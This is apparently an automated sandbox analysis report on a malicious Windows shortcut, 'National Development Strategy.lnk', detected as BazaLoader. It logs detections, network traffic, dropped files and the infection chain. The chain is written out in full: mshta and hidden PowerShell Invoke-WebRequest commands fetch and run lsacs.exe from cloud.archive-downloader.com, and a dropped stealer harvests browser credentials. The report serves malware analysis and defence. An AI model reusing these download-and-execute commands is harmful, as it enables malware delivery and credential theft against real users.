Windows Analysis Report
National Development Strategy.lnk

Overview

General Information

Sample Name: National Development Strategy.lnk
Analysis ID: 794563
MD5: 23c0523af70c2144cb3e29101039512d
SHA1: b61ab26a38322ee466e18fa381d0ede106f39e57
SHA256: 176b336f425bc15651672f96f70149873b10a3badfa040c8943bfe54955e043d

Detection

BazaLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected BazaLoader
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Found URL in windows shortcut file (LNK)
Suspicious powershell command line found
Powershell drops PE file
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

Source: National Development Strategy.lnk ReversingLabs: Detection: 26%
Source: National Development Strategy.lnk Virustotal: Detection: 29%
Source: cloud.archive-downloader.com Virustotal: Detection: 17%
Source: C:\ProgramData\lsacs.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe ReversingLabs: Detection: 50%
Source: unknown HTTPS traffic detected: 193.149.129.50:443 -> 192.168.2.3:49703 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.149.129.50:443 -> 192.168.2.3:49702 version: TLS 1.0
Source: unknown HTTPS traffic detected: 193.149.129.50:443 -> 192.168.2.3:49698 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.64.193.26:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdbMM source: steal.exe, 00000013.00000002.477336224.00007FFC12F6D000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdb source: steal.exe, 00000013.00000002.477336224.00007FFC12F6D000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\sqlite3.pdb source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C7DDC _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF6A42C7DDC
Source: Joe Sandbox View ASN Name: DANISCODK DANISCODK
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: global traffic HTTP traffic detected: GET /s.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cloud.archive-downloader.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /data/icons/google_jfk_icons_by_carlosjj/512/chrome.png HTTP/1.1Accept: */*Referer: https://cloud.archive-downloader.com/s.htaAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn1.iconfinder.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /lsacs.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: cloud.archive-downloader.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /file.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: cloud.archive-downloader.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: cloud.archive-downloader.com

System Summary

Source: Initial file Strings: https://cloud.archive-downloader.com/s.htayC:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\lsacs.exe
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: String function: 00007FFC0F649030 appears 115 times
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: String function: 00007FFC0F64A300 appears 166 times
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_Salsa20.pyd B62C10757F14113D98F47ED750D4AD78C9B758037288D540CAB728EBE52A7B70
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aes.pyd 4525ABB5CEF21DF5459B037ACF288D5A8F947EE6F7BDE63A7D296B59261396FE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aesni.pyd B1AFC84C800CF03D9B5C76D0C3CA3CFCBFEDEC21351105D093A7EFA632BB286B
Source: National Development Strategy.lnk ReversingLabs: Detection: 26%
Source: National Development Strategy.lnk Virustotal: Detection: 29%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" https://cloud.archive-downloader.com/s.hta
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/file.pdf -OutFile 'c:\programdata\file.pdf'; c:\programdata\file.pdf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/lsacs.exe -OutFile 'c:\programdata\lsacs.exe'; c:\programdata\lsacs.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command Remove-Item C:\Users\user\Downloads\Presidents_Strategy_2023.rar
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\programdata\file.pdf
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\ProgramData\lsacs.exe C:\programdata\lsacs.exe
Source: C:\ProgramData\lsacs.exe Process created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe C:\programdata\lsacs.exe
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: National Development Strategy.lnk LNK file: ..\..\..\..\Windows\System32\mshta.exe
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dapxgbjs.b5j.ps1
Source: classification engine Classification label: mal100.rans.troj.spyw.winLNK@24/108@4/3
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: steal.exe Binary or memory string: Insert thousands separators into a digit string. spec is a dictionary whose keys should include 'thousands_sep' and 'grouping'; typically it's the result of parsing the format specifier using _parse_format_specifier. The min_width keyword arg
Source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: steal.exe, 00000013.00000003.414480646.00000205617E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BAB30 GetProcessId,GenerateConsoleCtrlEvent,GetLastError,FormatMessageA,WaitForSingleObject,CloseHandle,SHFileOperationW, 18_2_00007FF6A42BAB30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5592:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_01
Source: steal.exe String found in binary or memory: The name of the reverse DNS pointer for the IP address, e.g.: >>> ipaddress.ip_address("127.0.0.1").reverse_pointer '1.0.0.127.in-addr.arpa' >>> ipaddress.ip_address("2001:db8::1").reverse_pointer '1.0.0.0.0.0.0.
Source: steal.exe String found in binary or memory: .ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/dlopen.htm https://www.ibm.com/support/knowledgecenter/en/ssw_aix_61/com.ibm.aix.basetrf1/load.htm AIX supports two styles for dlopen(): svr4 (System V Release 4) which is common on posix pla
Source: steal.exe String found in binary or memory: Fused multiply-add. Returns self*other+third with no rounding of the intermediate product self*other. self and other are multiplied together, with no rounding of the result. The third operand is then added to the result,
Source: steal.exe String found in binary or memory: address_list = (address *("," address)) / obs-addr-list obs-addr-list = *([CFWS] ",") address *("," [address / CFWS]) We depart from the formal grammar here by continuing to parse until the end of the input, assuming the input to be entirely
Source: steal.exe String found in binary or memory: s.mp64. AIX ABI compatibility is described as guaranteed at: https://www.ibm.com/ support/knowledgecenter/en/ssw_aix_72/install/binary_compatability.html For pep425 purposes the AIX platform tag becomes: "aix-{:1x}{:1d}{:02d}-{:04d}-{}".format
Source: steal.exe String found in binary or memory: ------ Idle _CS_IDLE None Request-started _CS_REQ_STARTED None Request-sent _CS_REQ_SENT None Unread-response _CS_IDLE <response_class> Req-started-unread-re
Source: steal.exe String found in binary or memory: | response.read() | putrequest() v v Idle Req-started-unread-response ______/| / | response.read() | | ( putheader() )* endheaders()
Source: steal.exe String found in binary or memory: v v Request-started Req-sent-unread-response | | response.read() v Request-sent This diagram presents the following rules: -
Source: steal.exe String found in binary or memory: ransitions: (null) | | HTTPConnection() v Idle | | putrequest() v Request-started | | ( putheader() )* endheaders() v Request-sent |\_____________________________ |
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdbMM source: steal.exe, 00000013.00000002.477336224.00007FFC12F6D000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\_lzma.pdb source: steal.exe, 00000013.00000002.477336224.00007FFC12F6D000.00000002.00000001.01000000.00000016.sdmp
Source: Binary string: C:\A\31\b\bin\amd64\sqlite3.pdb source: steal.exe, 00000013.00000002.469271562.00007FFC0F771000.00000002.00000001.01000000.00000034.sdmp

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/file.pdf -OutFile 'c:\programdata\file.pdf'; c:\programdata\file.pdf
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command Invoke-WebRequest -URI https://cloud.archive-downloader.com/lsacs.exe -OutFile 'c:\programdata\lsacs.exe'; c:\programdata\lsacs.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFBABAA1634 pushad ; ret 1_2_00007FFBABAA1631
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFBABAA15DD pushad ; ret 1_2_00007FFBABAA1631
Source: lsacs.exe.3.dr Static PE information: section name: _RDATA
Source: steal.exe.18.dr Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.18.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.18.dr Static PE information: section name: .00cfg
Source: vcruntime140.dll.18.dr Static PE information: section name: _RDATA

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\lsacs.exe
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\libffi-7.dll
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pywintypes39.dll
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\sqlite3.dll
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pyexpat.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_decimal.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_SHA256.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\select.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\libssl-1_1.dll
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_socket.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ecb.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_BLAKE2s.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\python39.dll
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_uuid.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Protocol\_scrypt.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_queue.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_bz2.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ofb.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aes.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ocb.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_elementtree.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_sqlite3.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\libcrypto-1_1.dll
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_lzma.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_ssl.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_ghash_portable.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\win32crypt.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_cbc.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_hashlib.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_eksblowfish.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Util\_strxor.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_ctr.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\vcruntime140.dll
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_SHA1.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_MD5.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_Salsa20.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pythoncom39.dll
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Util\_cpuid_c.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_cfb.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_ctypes.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\unicodedata.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Hash\_ghash_clmul.pyd
Source: C:\ProgramData\lsacs.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_aesni.pyd
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\lsacs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1840 Thread sleep count: 9475 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4648 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1400 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572 Thread sleep count: 9497 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6004 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3592 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6012 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pyexpat.pyd
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\Cryptodome\Cipher\_raw_eksblowfish.pyd
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_decimal.pyd
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\pythoncom39.dll
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_uuid.pyd
Source: C:\ProgramData\lsacs.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\_elementtree.pyd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9475
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9497
Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 857
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9768
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe API coverage: 2.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F650EB0 GetSystemInfo, 19_2_00007FFC0F650EB0
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C7DDC _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF6A42C7DDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\lsacs.exe File Volume queried: C:\ FullSizeInformation
Source: powershell.exe, 00000003.00000003.361575887.00000216C68C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllm
Source: mshta.exe, 00000000.00000003.282978341.00000242AB5CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.283782712.00000242AB600000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.283782712.00000242AB5CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.282978341.00000242AB600000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.283850237.00000242AB650000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.282798069.00000242AB650000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.345843094.0000021CB9638000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C4548 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF6A42C4548
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C9B98 GetProcessHeap, 18_2_00007FF6A42C9B98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BB754 SetUnhandledExceptionFilter,_invalid_parameter_noinfo, 18_2_00007FF6A42BB754
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42C4548 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF6A42C4548
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BBE4C SetUnhandledExceptionFilter, 18_2_00007FF6A42BBE4C
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BBC68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 18_2_00007FF6A42BBC68
Source: C:\ProgramData\lsacs.exe Code function: 18_2_00007FF6A42BB510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 18_2_00007FF6A42BB510
Source: C:\Users\user\AppData\Local\Temp\onefile_7072_133196035266869073\steal.exe Code function: 19_2_00007FFC0F76F3E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 19_2_00007FFC0F76F3E4
